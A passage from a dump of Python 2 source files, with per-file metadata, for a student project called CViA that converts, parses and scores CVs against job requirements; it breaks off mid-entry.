"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 17,
"path": "/cvConverter/DOCXFileConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nimport docx\n\n__author__ = 'siwei'\n\nclass DOCXFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"docx\"\n\n def convert(self):\n document = docx.Document(self.path)\n #return document.paragraphs[0].text\n docText = '\\n'.join([\n paragraph.text.encode('utf-8') for paragraph in document.paragraphs if paragraph.text != \"\"\n ])\n return self.text+docText"
},
{
"alpha_fraction": 0.7005347609519958,
"alphanum_fraction": 0.7433155179023743,
"avg_line_length": 25.714284896850586,
"blob_id": "42dbb563a99a1c887e8d64be84f6fb87f33c9a7d",
"content_id": "a264435e365ae2064d9f14cd9f52db895e05ccfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 187,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 7,
"path": "/README.md",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "# CViA\nCurriculum Vitae Analyzer\n\n# Setup\n- Install Python packages: `pip install -r requirements.txt`\n- Start the server: `python main.py`\n- Open [localhost:8888](http://localhost:8888)\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 23,
"blob_id": "0f082469178c40843176800708f923dce7f93237",
"content_id": "44550c021d928027900f5ad27d88cbeddf4669f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/CVFields/__init__.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n"
},
{
"alpha_fraction": 0.5077071189880371,
"alphanum_fraction": 0.5154142379760742,
"avg_line_length": 29.558822631835938,
"blob_id": "e14362724dae62197b55dd1e7b4015f442efde7b",
"content_id": "8b803fba02dfecd9bd1c767029f5318aa5f0cfe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 34,
"path": "/cvEvaluator/EduEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass EduEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"education\"\n\n def evaluate(self, req, cv):\n req_edu = req[self.name]\n cv_edu = cv[self.name]\n edu_score = 0\n if req_edu == [] or cv_edu == []:\n return edu_score\n # print \"req \"+req[0]+\" has\"+str(cv)\n uni_list = []\n with open('university.txt') as f:\n content = f.readlines()\n for n in range(0, len(content)):\n uni = content[n][:-1].lower()\n uni_list.append(uni)\n # print uni_list\n\n for eduItem in cv_edu:\n # check degree requirement\n if req_edu[0] in eduItem['degree'].lower():\n edu_score += 20\n # check university ranking\n if eduItem['university'].lower() in uni_list:\n edu_score += 5\n #self.score = edu_score\n return edu_score"
},
{
"alpha_fraction": 0.5791962146759033,
"alphanum_fraction": 0.5823482871055603,
"avg_line_length": 22.518518447875977,
"blob_id": "72838bcea5f731a3e4136ce200e3165dc546f77a",
"content_id": "1a78ff7b96e1345c831439a143163973439f0cbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1269,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 54,
"path": "/Service.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from Controller import Controller\nfrom train_classifier import train\nimport pprint\n__author__ = 'siwei'\n\ncontroller = Controller()\ncontroller.setup_evaluators()\n\ndef input_requirement(requirement):\n controller.setup_requirement(requirement)\n\ndef input_weight(weight):\n controller.set_weight(weight)\n\ndef input_job_function(job_function):\n \"123\"\n\ndef evaluate_cvs(cvs):\n print \"evaluating CVs...\"\n controller.evaluate(cvs)\n return controller.get_scores()\n\ndef tran_classifier():\n train()\n\n\nif __name__ == \"__main__\":\n requirement = {\n 'education':['bachelor'],\n 'skill': {\n 'must': ['windows','vpn','Web Development'],\n 'good': ['xp','iOS']\n },\n 'language':{\n 'must': ['English'],\n 'good': ['Chinese']\n },\n 'experience':{\n 'must': ['r'],\n 'good': []\n },\n 'other':['reading']\n }\n\n cvs = [\"cv/simple.doc\",\n \"cv/LinkedIn/YaminiBhaskar.pdf\",\n \"cv/LinkedIn/DonnabelleEmbodo.pdf\",\n \"cv/LinkedIn/PraveenDeorani.pdf\",\n \"cv/LinkedIn/RussellOng.pdf\",\n \"cv/LinkedIn/YaminiBhaskar.pdf\"]\n\n input_requirement(requirement)\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(evaluate_cvs(cvs))"
},
{
"alpha_fraction": 0.663755476474762,
"alphanum_fraction": 0.663755476474762,
"avg_line_length": 22,
"blob_id": "3c63d4012bb4d9a76e83dbd07df52b725341dd34",
"content_id": "96ccd1919502963459293084d87fcd20243dde8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/CVFields/EducationField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass EducationField(Field):\n\n def __init__(self,university,degree,major):\n self.university = university\n self.degree = degree\n self.major = major"
},
{
"alpha_fraction": 0.6797385811805725,
"alphanum_fraction": 0.6797385811805725,
"avg_line_length": 18.25,
"blob_id": "4d388ceec3f5c66f8307a9ac241064831e2802ef",
"content_id": "eed6297a422c2c0be214c9495210436f0a15533d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 8,
"path": "/CVFields/LanguageField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass LanguageField(Field):\n\n def __init__(self,textlist):\n self.language = textlist"
},
{
"alpha_fraction": 0.5259740352630615,
"alphanum_fraction": 0.5292207598686218,
"avg_line_length": 18.25,
"blob_id": "5c6be0dd31f04629687d4ca44f0f5ae825ac4968",
"content_id": "a9e1fe50744a134d3b6b9adab859027a8e38eea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 16,
"path": "/cvEvaluator/BaseEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n\nclass BaseEvaluator:\n\n def __init__(self):\n self.score = 0\n self.name = \"\"\n\n def get_name(self):\n return self.name\n\n def get_score(self):\n return self.score\n\n def to_string(self):\n return \"[\"+self.get_name()+\": \"+str(self.get_score())+\"]\"\n"
},
{
"alpha_fraction": 0.511864423751831,
"alphanum_fraction": 0.5279660820960999,
"avg_line_length": 41.14285659790039,
"blob_id": "f8296269eba6a67972069b1da54cb277d6b132f0",
"content_id": "641f7aa42646afe281d3809472ded1d7f0c7e297",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2360,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 56,
"path": "/cvParser/VolunteerExpParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "\nimport re\nimport FieldFactory\n\n__author__ = 'haojiang'\n\n\nclass VolunteerExpParser:\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseVolunteerExp(self,ExpStr):\n VolunteerExpList = ExpStr.splitlines()\n dateArr = []\n result = []\n for i in range(0,len(VolunteerExpList)):\n if self.MatchExpDate(VolunteerExpList[i]):\n dateArr.append(i)\n for i in range(0,len(dateArr)):\n index = dateArr[i]\n if i != len(dateArr)-1:\n title = VolunteerExpList[index-1]\n period = VolunteerExpList[index].split(\"(\")[1][:len(VolunteerExpList[index].split(\"(\")[1])-1]\n description = \"\"\n\n ### Not EMPTY description ###\n if index+3 != dateArr[i+1]:\n temp = index+2\n end = dateArr[i+1]-1\n while(temp!=end):\n description = description + VolunteerExpList[temp]\n temp+=1\n\n else:\n title = VolunteerExpList[index-1]\n period = VolunteerExpList[index].split(\"(\")[1][:len(VolunteerExpList[index].split(\"(\")[1])-1]\n description =\"\"\n\n ### Not EMPTY description\n if index+1 != len(VolunteerExpList):\n temp=index+2\n end = len(VolunteerExpList)\n while(temp!=end):\n description = description + VolunteerExpList[temp]\n temp+=1\n result.append(self.factory.produce(\"volunteerexp\",title,period,description))\n return result\n\n def MatchExpDate(self,text): # <--- Check whether the string is a date string\n if len(text.split(\"(\"))>1 and len(text)<50 and \"-\" in text:\n # From \" May 2013 - May 2015 (2 years)\" extract date.\n first = text.split(\"(\")[0].split(\"-\")[0]\n second = text.split(\"(\")[0].split(\"-\")[1]\n return re.findall(r'(?:january|february|march|april|may|june|july|august|september|october|november|december)\\s\\d{4}', first) !=[] and \\\n (re.findall(r'(?:january|february|march|april|may|june|july|august|september|october|november|december)\\s\\d{4}', second) !=[] or second ==\" present \")\n else:\n return False"
},
{
"alpha_fraction": 0.550000011920929,
"alphanum_fraction": 0.5541666746139526,
"avg_line_length": 25.66666603088379,
"blob_id": "1916b7c4ba10c506025a9b69bea05d01d461f920",
"content_id": "d969550608342860be400fd7ffb1a472b80fcff1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 480,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/cvParser/PublicationsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\n\nclass PublicationsParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParsePublications(self,text): pass\n # textList = text.splitlines()\n # keyIndex = []\n # result = []\n # for i in range(0,len(textList)):\n # if \"Authors:\" in textList[i]:\n # keyIndex.append(i)\n # for i in range(0,len(keyIndex)):\n # theIndex = keyIndex[i]\n"
},
{
"alpha_fraction": 0.7472527623176575,
"alphanum_fraction": 0.7472527623176575,
"avg_line_length": 12.142857551574707,
"blob_id": "74dfd007e4ac2873ff773cff548e04facdba86be",
"content_id": "b141af0709d354fb56680082c6fd2598b2c53e4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/CVFields/SummaryField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\n\n\nfrom CVFields.Field import Field\n\nclass SummaryField(Field):pass"
},
{
"alpha_fraction": 0.6654411554336548,
"alphanum_fraction": 0.6654411554336548,
"avg_line_length": 23.81818199157715,
"blob_id": "ffe20461dddddb175fe6d0d081ee0d01ccc85e87",
"content_id": "d481f015d2858b72bb0e3a4f9f7e4c3635189f20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/CVFields/ExperienceField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass ExperienceField(Field):\n\n def __init__(self,title,period,description,company):\n self.title = title\n self.period = period\n self.description = description\n self.company = company"
},
{
"alpha_fraction": 0.5432098507881165,
"alphanum_fraction": 0.5444444417953491,
"avg_line_length": 20.891891479492188,
"blob_id": "1482d573b6bc6274edde301aaca7d26eb542465c",
"content_id": "69697dd4d6b9894d7032d351ef65f689046590e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 810,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 37,
"path": "/cvEvaluator/Evaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import pprint\n\n__author__ = 'siwei'\n\n\nclass Evaluator:\n\n def __init__(self):\n self.cv = {}\n self.requirement = {}\n self.scored_cv = {}\n self.evaluators = []\n\n def set_cv(self, cv):\n self.cv = cv\n\n def set_requirement(self, req):\n self.requirement = req\n\n def add(self, eva):\n self.evaluators.append(eva)\n\n def evaluate(self):\n this_score = {}\n for eva in self.evaluators:\n eva_name = eva.get_name()\n this_score[eva_name] = eva.evaluate(self.requirement, self.cv)\n self.scored_cv = {'cv': self.cv['path'], 'score': this_score}\n return self.scored_cv\n\n def print_rank(self):\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(self.scored_cv)\n\n\nif __name__ == \"__main__\":\n print \"\"\n"
},
{
"alpha_fraction": 0.6774193644523621,
"alphanum_fraction": 0.6774193644523621,
"avg_line_length": 19.75,
"blob_id": "6e31956b83a5fef68c8d2ab867f6b2de69e84298",
"content_id": "e8337c2aa3adec2f916bc8163edfaa8af7ce4841",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 12,
"path": "/cvConverter/TXTFileConveryer.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nimport docx\n\n__author__ = 'siwei'\n\nclass TXTFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"txt\"\n\n def convert(self):\n return self.text+open(self.path).read()"
},
{
"alpha_fraction": 0.5332606434822083,
"alphanum_fraction": 0.5419847369194031,
"avg_line_length": 28.612903594970703,
"blob_id": "1bff2369fa7cca0bff503dee9159378f34787c61",
"content_id": "773857658fe015461f43c5b3838e21538f459940",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 917,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 31,
"path": "/cvScorer/Scorer.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n\nclass Scorer:\n def __init__(self):\n self.ratio = {}\n\n def set_weight(self, weight):\n ratio_total = 0\n for r in weight:\n ratio_total += weight[r]\n for r in weight:\n self.ratio[r] = weight[r]*1.0/ratio_total\n\n def set_default_weight(self, scored_cv):\n num_field = len(scored_cv['score'])\n for f in scored_cv['score']:\n self.ratio[f] = 1.0/num_field\n\n def cal_score(self, scored_cv):\n total_score = 0\n scores = scored_cv['score']\n for key in scores:\n total_score += scores[key]*self.ratio[key]\n return total_score\n\n def cal_all_score(self, scored_cvs):\n if self.ratio == {}:\n self.set_default_weight(scored_cvs[0])\n for i in range(0, len(scored_cvs)):\n scored_cvs[i]['total'] = self.cal_score(scored_cvs[i])\n return scored_cvs"
},
{
"alpha_fraction": 0.6464646458625793,
"alphanum_fraction": 0.6464646458625793,
"avg_line_length": 25.46666717529297,
"blob_id": "675228d17112526fa759b9f14f25e95db35e81ca",
"content_id": "ea08ae2453f59d0083da7acc712a711bddadef41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 15,
"path": "/cvConverter/DOCFileConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvConverter.BaseConverter import BaseConverter\nfrom subprocess import Popen, PIPE\n\n__author__ = 'siwei'\n\nclass DOCFileConverter(BaseConverter):\n\n def __init__(self):\n self.type = \"doc\"\n\n def convert(self):\n cmd = ['antiword', self.path]\n p = Popen(cmd, stdout=PIPE)\n stdout, stderr = p.communicate()\n return self.text+stdout.decode('ascii', 'ignore')"
},
{
"alpha_fraction": 0.5726760625839233,
"alphanum_fraction": 0.5784212350845337,
"avg_line_length": 39.6682243347168,
"blob_id": "1664d0ceb246b1213c8cf48de8ea31ef1f2f9502",
"content_id": "a8cf2f1defd4515ff6af4be7c911c8dc9e6dd45f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8703,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 214,
"path": "/cvParser/Parser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import unicodedata\nfrom cvConverter import Converter\nimport ExpParser\nimport LanguageParser\nimport SkillParser\nimport EduParser\nimport VolunteerExpParser\nimport InterestsParser\nimport PublicationsParser\nimport ProjectsParser\nimport CertificationsParser\nimport re\nimport unicodedata\n__author__ = 'haojiang'\n\n\nclass Parser:\n\n def __init__(self):\n self.path = \"\"\n self.summary = \"\"\n self.experience = \"\"\n self.expParser = ExpParser.ExpParser()\n self.publications = \"\"\n self.publicationsParser = PublicationsParser.PublicationsParser()\n self.project = \"\"\n self.projectParser = ProjectsParser.ProjectsParser()\n self.language = \"\"\n self.languageParser = LanguageParser.LanguageParser()\n self.skill = \"\"\n self.skillParser = SkillParser.SkillParser()\n self.education = \"\"\n self.eduParser = EduParser.EduParser()\n self.volunteerexperience=\"\"\n self.volunteerexperienceParser = VolunteerExpParser.VolunteerExpParser()\n self.interest = \"\"\n self.interestParser = InterestsParser.InterestParser()\n self.certifications = \"\"\n self.certificationsParser = CertificationsParser.Certifications()\n self.honors = \"\"\n self.organizations = \"\"\n self.courses = \"\"\n self.i=0\n self.keywords = [\"Summary\",\"Experience\",\"Publications\",\n \"Projects\",\"Languages\",\"Education\",\n \"Skills & Expertise\",\"Volunteer Experience\",\"Certifications\",\n \"Interests\",\"Honors and Awards\",\"Organizations\",\"Courses\"]\n\n def IsKeyWord(self,word):\n return word in self.keywords\n\n def ConstructStr(self,textList):\n result = \"\"\n word = textList[self.i+1]\n while(self.IsKeyWord(word) is False or self.i<len(textList) is False):\n self.i+=1\n if word[:4] !=\"Page\":\n if result is \"\":\n result = result+word\n else:\n result = result+\"\\n\"+word\n if self.i==len(textList)-1:\n break\n else:\n word = textList[self.i+1]\n return result\n\n\n\n def AnalyseText(self,text):\n if isinstance(text, unicode):\n text = unicodedata.normalize('NFKD', text).encode('ascii','ignore')\n textList = text.splitlines()\n\n for i in range(len(textList)-1,0,-1):\n list = textList[i].split()\n if len(list) > 3:\n if list[0] == \"Contact\" and list[len(list)-1] == \"LinkedIn\":\n textList = textList[:i-5]\n break\n\n for i in range(0,len(textList)):\n textList[i] = textList[i].strip() # Trim\n textList = filter(None,textList) # Remove ['']\n self.path = textList[0]\n while (self.i<len(textList)):\n word = textList[self.i]\n if self.IsKeyWord(word):\n if word == 'summary':\n self.summary = self.ConstructStr(textList)\n elif word == 'Experience':\n Expstr = self.ConstructStr(textList)\n self.experience = self.expParser.ParseExp(Expstr)\n #print self.experience\n elif word == 'Publications':\n Publicationsstr = self.ConstructStr(textList)\n self.publications = Publicationsstr\n elif word == 'Certifications':\n Certificationsstr = self.ConstructStr(textList)\n self.certifications = self.certificationsParser.ParseCertifications(Certificationsstr)\n #print self.certifications\n elif word == 'Projects':\n Projectstr = self.ConstructStr(textList)\n self.project = self.projectParser.ParseProjects(Projectstr)\n #print self.project\n elif word == 'Languages':\n Languagestr = self.ConstructStr(textList)\n self.language = self.languageParser.ParseLanguage(Languagestr)\n #print self.language\n elif word == 'Skills & Expertise':\n Skillstr = self.ConstructStr(textList)\n self.skill = self.skillParser.ParseSkill(Skillstr)\n #print self.skill\n elif word == 'Education':\n Edustr = 
self.ConstructStr(textList)\n self.education = self.eduParser.ParseEdu(Edustr)\n #print self.education\n elif word == 'Volunteer Experience':\n VolunteerExpstr = self.ConstructStr(textList)\n self.volunteerexperience = self.volunteerexperienceParser.ParseVolunteerExp(VolunteerExpstr)\n #print self.volunteerexperience\n elif word == '\\x0cInterests' or word == 'Interests':\n Intereststr = self.ConstructStr(textList)\n self.interest = self.interestParser.ParseInterest(Intereststr)\n #print self.interest\n elif word == \"Honors and Awards\":\n str = self.ConstructStr(textList)\n self.honors = str;\n elif word == \"Organizations\":\n str = self.ConstructStr(textList)\n self.organizations = str\n elif word == \"Courses\":\n str = self.ConstructStr(textList)\n self.courses = str\n self.i = self.i + 1\n\n def convertToObj(self,text):\n self.AnalyseText(text)\n res = self.__dict__.copy()\n self.reset()\n del res[\"i\"]\n del res[\"expParser\"]\n del res[\"skillParser\"]\n del res[\"languageParser\"]\n del res[\"eduParser\"]\n del res[\"publicationsParser\"]\n del res[\"projectParser\"]\n del res[\"certificationsParser\"]\n del res[\"interestParser\"]\n del res[\"volunteerexperienceParser\"]\n del res[\"keywords\"]\n return res\n\n def reset(self):\n self.path = \"\"\n self.summary = \"\"\n self.experience = \"\"\n self.expParser = ExpParser.ExpParser()\n self.publications = \"\"\n self.publicationsParser = PublicationsParser.PublicationsParser()\n self.project = \"\"\n self.projectParser = ProjectsParser.ProjectsParser()\n self.language = \"\"\n self.languageParser = LanguageParser.LanguageParser()\n self.skill = \"\"\n self.skillParser = SkillParser.SkillParser()\n self.education = \"\"\n self.eduParser = EduParser.EduParser()\n self.volunteerexperience=\"\"\n self.volunteerexperienceParser = VolunteerExpParser.VolunteerExpParser()\n self.interest = \"\"\n self.interestParser = InterestsParser.InterestParser()\n self.certifications = \"\"\n self.certificationsParser = CertificationsParser.Certifications()\n self.honors = \"\"\n self.organizations = \"\"\n self.courses = \"\"\n self.i=0\nif __name__ == \"__main__\":\n converter = Converter.DocConverter()\n CV1 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/YingxinZhang.pdf\")\n CV2 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/YukunDuan.pdf\")\n CV3 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/ZhenNi.pdf\")\n CV4 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/Teck KeongSeow.pdf\")\n CV5 = converter.documentToText(\"/Users/haojiang/Desktop/CViA/cv/YimingZhou.pdf\")\n\n P = Parser()\n print P.convertToObj(CV1)\n print P.convertToObj(CV2)\n print P.convertToObj(CV3)\n print P.convertToObj(CV4)\n print P.convertToObj(CV5)\n\n\n\n # result = P.__dict__\n # del result[\"i\"]\n # print result[\"Experience\"].splitlines()\n\n # f = FieldFactory.FieldFacory()\n # edu = f.produceEdu()\n # print edu.__dict__\n # print edu.GetScore()\n # print re.findall(r'(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\\s\\d{4}', \"May 2010 \") !=[]\n # str = 'September 2015 - Present (2 months)'\n # print str.split(\"(\")[0].split(\"-\")[1].split()\n # print str.split(\"(\")[0].split(\"-\")[0].split()\n # print str.split(\"(\")[0].split(\"-\")[1] == \" Present \"\n # first = str.split(\"(\")[0].split(\"-\")[0]\n # second = str.split(\"(\")[0].split(\"-\")[1]\n # print first\n # print second\n # print re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', 
first) !=[] and \\\n # (re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{4}', second) !=[] or second ==\" Present \")\n"
},
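The Parser entry above walks the converted CV text line by line and switches on section headers ('Volunteer Experience', 'Interests', 'Honors and Awards', 'Organizations', 'Courses'), handing each section's lines to a dedicated sub-parser. A minimal, self-contained sketch of that header-driven sectioning idea; the header set and sample text here are illustrative, not taken from the repo:

```python
# Sketch: group lines under the most recently seen section header.
HEADERS = {"Summary", "Volunteer Experience", "Interests",
           "Honors and Awards", "Organizations", "Courses"}

def split_sections(text):
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip().lstrip("\x0c")  # drop form-feed page breaks, as the parser above does
        if line in HEADERS:
            current = line
            sections[current] = []
        elif current is not None and line:
            sections[current].append(line)
    return sections

sample = "Interests\nrobotics, chess\nCourses\nCS4248\n"
print(split_sections(sample))
# {'Interests': ['robotics, chess'], 'Courses': ['CS4248']}
```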
{
"alpha_fraction": 0.650602400302887,
"alphanum_fraction": 0.6580439209938049,
"avg_line_length": 36.62666702270508,
"blob_id": "6a080928c6478c6fb8b9f99193145414b649ca67",
"content_id": "7c55367bdef434a110f2bd045ff4c1421a3ed399",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2822,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 75,
"path": "/FieldFactory.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields import EducationField\nfrom CVFields import ExperienceField\nfrom CVFields import LanguageField\nfrom CVFields import Skill_ExpertiseField\nfrom CVFields import VolunteerField\nfrom CVFields import InterestsField\nfrom CVFields import CertificationField\nfrom CVFields import ProjectField\nfrom CVFields import PublicationField\n\nclass FieldFacory:\n def __init__(self):\n pass\n\n def produceEdu(self,university,degree,major):\n return EducationField.EducationField(university,degree,major).__dict__\n\n def produceExp(self,title,period,description,company):\n return ExperienceField.ExperienceField(title,period,description,company).__dict__\n\n def produceLanguage(self,textList):\n return LanguageField.LanguageField(textList).__dict__[\"language\"]\n\n def produceSkill(self,textList):\n return Skill_ExpertiseField.Skill_ExpertiseField(textList).__dict__[\"skill\"]\n\n def produceVolunteerExp(self,title,period,description):\n return VolunteerField.VolunteerExpField(title,period,description).__dict__\n\n def produceInterest(self,textList):\n return InterestsField.InterestsField(textList).__dict__[\"interest\"]\n\n def produceCertifications(self,title,company,license,date):\n return CertificationField.CertificationField(title,company,license,date).__dict__\n\n def produceProjects(self,title,date,description):\n return ProjectField.ProjectField(title,date,description).__dict__\n\n def produce(self,*args):\n fieldName = args[0]\n if fieldName == \"exp\":\n title = args[1]\n period = args[2]\n description = args[3]\n company = args[4]\n return self.produceExp(title,period,description,company)\n elif fieldName == \"edu\":\n university = args[1]\n degree = args[2]\n major = args[3]\n return self.produceEdu(university,degree,major)\n elif fieldName == \"projects\":\n title = args[1]\n date = args[2]\n description = args[3]\n return self.produceProjects(title,date,description)\n elif fieldName == \"language\":\n return self.produceLanguage(args[1])\n elif fieldName == \"skill\":\n return self.produceSkill(args[1])\n elif fieldName == \"volunteerexp\":\n title = args[1]\n period = args[2]\n description = args[3]\n return self.produceVolunteerExp(title,period,description)\n elif fieldName == \"interest\":\n return self.produceInterest(args[1])\n elif fieldName == \"certifications\":\n title = args[1]\n company = args[2]\n license = args[3]\n date = args[4]\n return self.produceCertifications(title,company,license,date)\n"
},
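FieldFacory.produce dispatches on its first positional argument and returns a plain dict built by the matching CVFields class. A self-contained sketch of the same varargs dispatch pattern (class and key names here are illustrative, not the repo's):

```python
class MiniFieldFactory:
    """Sketch of dispatch-by-name; the real factory delegates to CVFields classes."""
    def produce(self, *args):
        field = args[0]
        if field == "edu":
            university, degree, major = args[1:4]
            return {"university": university, "degree": degree, "major": major}
        elif field == "exp":
            title, period, description, company = args[1:5]
            return {"title": title, "period": period,
                    "description": description, "company": company}
        raise ValueError("unknown field: " + field)

f = MiniFieldFactory()
print(f.produce("edu", "NUS", "BSc", "Computer Science"))
```

A dict mapping field names to builder functions would avoid the growing if/elif chain, at the cost of a little indirection.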
{
"alpha_fraction": 0.4918699264526367,
"alphanum_fraction": 0.4972899854183197,
"avg_line_length": 26.33333396911621,
"blob_id": "89d4da6a5b13736028d379fb8c9551d892a54362",
"content_id": "00f17839795c32afcb9f9bc2e60b006a793191b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 27,
"path": "/cvEvaluator/LangEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass LangEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"language\"\n\n def evaluate(self, req, cv):\n req_lang = req[self.name]\n cv_lang = cv[self.name]\n if req_lang == [] or cv_lang == []:\n return 0\n lang_score = 0\n for pri in req_lang:\n lang_list = req_lang[pri]\n if pri == 'must':\n base_score = 5\n else:\n base_score = 2\n for s in lang_list:\n if s in cv_lang:\n lang_score += base_score\n #self.score = lang_score\n return lang_score\n"
},
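The evaluator awards 5 points per matched 'must' language and 2 per matched 'good' one. The same scoring rule in isolation, with a made-up requirement dict of the shape used above:

```python
def lang_score(req_lang, cv_lang):
    score = 0
    for priority, wanted in req_lang.items():
        base = 5 if priority == "must" else 2  # 'must' outweighs 'good'
        score += base * sum(1 for lang in wanted if lang in cv_lang)
    return score

req = {"must": ["English"], "good": ["Chinese", "Malay"]}
print(lang_score(req, ["English", "Chinese"]))  # 5 + 2 = 7
```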
{
"alpha_fraction": 0.4641598165035248,
"alphanum_fraction": 0.47003525495529175,
"avg_line_length": 19.780487060546875,
"blob_id": "9e0fa00163e60d16ab2908b6008f48a71699559a",
"content_id": "b92e877783b4f9b19e090bc63352db06d9d9b64c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 851,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 41,
"path": "/cvStore/store.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
